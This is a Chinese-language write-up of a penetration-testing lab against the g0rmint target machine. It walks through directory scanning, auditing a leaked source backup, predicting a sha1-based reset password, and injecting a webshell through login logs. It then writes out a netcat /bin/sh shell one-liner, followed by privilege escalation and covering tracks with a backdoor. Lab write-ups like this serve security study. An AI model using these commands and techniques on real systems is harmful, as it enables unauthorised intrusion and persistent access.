g0rmint渗透测试
0x00实验环境
靶机:g0rmint,IP地址:192.168.8.143
测试机:Kali,IP地址:192.168.8.145;
0x01实验流程
信息收集——主机发现、端口扫描
渗透测试
0x02实验步骤
- 主机发现
- 端口及服务扫描
- 访问web
扫描web目录
访问robots.txt
扫描该目录下子目录并访问
尝试弱口令登录,错误
- 查看页面源代码
发现一个目录名
扫描该目录并访问
下载该备份文件
192.168.8.143/g0rmint/s3cretbackupdirect0ry/backup.zip
- 解压并浏览该备份文件
应当是该网站的源码备份
审计源代码,寻找有用信息
首先,再login.php中发现,为成功登录的信息会保存为日志
再config.php中
发现日志会以年月日.php的形式保存
- 根据上面得出的信息,尝试再登陆出写入一句话木马被记录
尝试蚁剑连接,错误
BP抓包
考虑应该需要登录才可以
继续审计代码
在reset.php中
发现我们提交邮箱用户名申请修改密码后,会将当天的时间日期格式化然后hash sha1加密作为需改后的密码并发给用户邮箱
那么,可以复制该密码生成语句在本地生成密码
PHP gmdate() 函数:
格式化 GMT/UTC 日期和时间,并返回已格式化的日期字符串
noman
得到密码: 110afb3be000064e4ffd
- 登录后台
但是没有什么有价值信息,bp抓包
http://192.168.8.143/g0rmint/s3cr3t-dir3ct0ry-f0r-l0gs/2020-03-29.php
发现可以执行命令
写入反弹shell
依次执行
'mkfifo /tmp/t';
'cat /tmp/t | /bin/sh -i 2>&1 | nc -l 8888 > /tmp/t';
但是需要转码
Kali nc连接
- 提权
在靶机上下载编译好的提权脚本并赋权运行
提权成功
- 清理痕迹,留下后门
总结:
- 扫描网站目录,获取备份文件
- 审计网站源码,获取关键性信息
- 登录后台,并BP抓包写入反弹shell
- Getshell后根据系统版本进行提权并清理痕迹